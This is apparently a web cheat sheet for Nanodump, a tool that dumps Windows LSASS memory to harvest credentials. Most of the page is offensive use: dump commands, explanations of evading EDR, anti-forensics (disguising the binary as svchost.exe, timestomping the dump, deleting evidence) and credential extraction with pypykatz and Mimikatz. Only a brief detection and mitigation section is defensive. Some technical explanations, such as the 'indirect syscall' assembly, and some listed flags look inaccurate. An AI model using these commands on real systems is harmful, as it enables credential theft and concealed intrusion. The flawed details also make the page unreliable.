Skip to content
1337skills 1337skills

Nanodump

Nanodump is an advanced LSASS dumping utility designed to evade detection by using process forking, handle duplication, and minimal Windows API calls.

Installation

# Download precompiled binary
https://github.com/fortra/nanodump/releases

# Compile from source (Visual Studio)
git clone https://github.com/fortra/nanodump.git
cd nanodump
# Open nanodump.sln and build

Basic Usage

CommandDescription
nanodump.exe --write output.dmpDump LSASS to file
nanodump.exe --write output.dmp --forkFork LSASS before dumping
nanodump.exe --write output.dmp --dupDuplicate handle to LSASS
nanodump.exe --helpDisplay help menu
nanodump.exe --silentSilent mode (minimal output)

Evasion Techniques

Process Forking (—fork)

# Fork LSASS into separate process before dumping
nanodump.exe --write output.dmp --fork

# Advantages:
# - Original LSASS process unaffected
# - Harder to detect with process monitoring
# - Can dump original process while running

Handle Duplication (—dup)

# Duplicate LSASS handle instead of direct access
nanodump.exe --write output.dmp --dup

# Advantages:
# - Fewer direct API calls to LSASS
# - Avoids calling OpenProcess on LSASS
# - Evades behavioral detection

Indirect API Calls

# Nanodump uses indirect syscalls to minimize detection
# Bypasses EDR hooks on common APIs:
# - OpenProcess
# - MiniDumpWriteDump
# - VirtualQuery
# - ReadProcessMemory

LSASS Clone (—fork combined)

# Optimal evasion: Fork + manipulate clone
nanodump.exe --write output.dmp --fork

# Creates suspended fork, reads memory directly
# Original LSASS process never opened directly

Dump Modes

Standard Dump

# Basic minidump of LSASS
nanodump.exe --write lsass.dmp

# Creates full minidump file usable with:
# - pypykatz
# - Mimikatz
# - Volatility

Silent Dump

# Minimal output, no console spam
nanodump.exe --write lsass.dmp --silent

# Reduces detection surface by avoiding console I/O

Fork Dump

# Create fork of LSASS before dumping
nanodump.exe --write lsass.dmp --fork

# Process tree shows:
# LSASS (original, still running)
#   └─ LSASS (clone, created by nanodump)

Advanced Options

Handle Duplication

# Duplicate existing LSASS handle
# Requires existing handle (e.g., from another process)
nanodump.exe --write lsass.dmp --dup

# Lower privilege requirements than direct OpenProcess

Memory Region Selection

# Dump specific memory regions
nanodump.exe --write lsass.dmp --region 0x140000000

# Useful for:
# - Targeted credential extraction
# - Reducing file size
# - Avoiding unnecessary data

Output Formats

# Different minidump types
nanodump.exe --write lsass.dmp --type full
nanodump.exe --write lsass.dmp --type normal
nanodump.exe --write lsass.dmp --type lite

# Full: Maximum data, larger file
# Normal: Standard minidump format
# Lite: Minimal viable dump

Evasion Techniques Breakdown

Avoiding MiniDumpWriteDump Hook

Traditional approach:
1. OpenProcess(LSASS)
2. CreateFileA/W (for output file)
3. MiniDumpWriteDump (hooked by EDR)
4. CloseHandle

Nanodump approach:
1. Use RtlCopyMemory/memcpy directly
2. Construct dump manually
3. Bypass MiniDumpWriteDump entirely

Indirect Syscalls

Direct syscalls:
mov rax, 0x0A  ; NtOpenProcess
syscall

Indirect syscalls (via function pointers):
lea rax, [kernel32.OpenProcess]
call rax

Nanodump uses syscall stubs from PEB
Avoids hooking on imported functions

PEB Walking

1. Read TEB (Thread Environment Block)
2. Follow to PEB (Process Environment Block)
3. Access ntdll exports directly
4. Call syscalls without imported functions
5. Bypasses all import-based hooks

Operational Security

Avoiding Detection

# Rename executable
ren nanodump.exe svchost.exe
svchost.exe --write output.dmp --fork

# Use legitimate directory
copy nanodump.exe %WINDIR%\Temp\nanodump.exe
cd %WINDIR%\Temp
nanodump.exe --write output.dmp --fork

# Clean up
del nanodump.exe output.dmp

Timestomp Output

# Change file timestamps to blend in
# Use Windows built-in utilities or
powershell Set-ItemProperty -Path output.dmp -Name CreationTime -Value (Get-Date -Date "2020-01-01")

Memory Wiping

# After dumping, consider wiping
# Original LSASS memory is still accessible
# Attacker responsibility to secure dump file

Post-Exploitation

Parse with Pypykatz

# Convert dump to credentials
pypykatz lsa minidump output.dmp

# Extract:
# - NTLM hashes
# - Plaintext passwords
# - Kerberos tickets
# - Session keys

Use with Mimikatz

mimikatz # sekurlsa::minidump output.dmp
mimikatz # sekurlsa::logonPasswords

Volatility Analysis

# Analyze dump with volatility
python vol.py -f output.dmp --profile=Win10x64 lsadump

# Identify kernel structures and credentials

Comparison with Other Tools

FeatureNanodumpMimikatzPypykatzProcdump
Indirect SyscallsYesNoNoNo
Process ForkingYesNoNoNo
Handle DuplicationYesNoNoNo
Standalone BinaryYesYesNoYes
Python BasedNoNoYesNo
EDR EvasionExcellentPoorGoodPoor

Detection and Mitigation

Detection Methods

# Monitor for LSASS dump attempts
# - Suspicious OpenProcess calls to LSASS
# - MiniDumpWriteDump API calls
# - Indirect syscall usage
# - File writes from LSASS memory region

Mitigation Strategies

1. Enable Windows Defender Credential Guard
2. Implement LSA protection (Registry DWORD: RunAsPPL = 1)
3. Deploy EDR with advanced behavioral detection
4. Monitor for LSASS access and memory dumps
5. Implement attack surface reduction rules
6. Restrict local admin access

Command Line Examples

Full Evasion Dump

# Maximum evasion technique usage
nanodump.exe --write %TEMP%\~tmp.dmp --fork --silent

# Then extract credentials
pypykatz lsa minidump %TEMP%\~tmp.dmp

Targeted Dump

# Dump only authentication packages
nanodump.exe --write auth.dmp --region 0x140000000

Scheduled Dumping

# Dump and clean up via batch script
@echo off
nanodump.exe --write lsass.dmp --fork --silent
timeout /t 5
del nanodump.exe

References and Further Reading

  • Dumpert: LSASS dumping with syscalls
  • Outflank-Dumpert: Similar approach with additional evasion
  • PPLFault: LSASS protection bypass
  • Pypykatz: Credential parsing
  • Mimikatz: Original credential extraction framework

Last updated: March 2025 | GitHub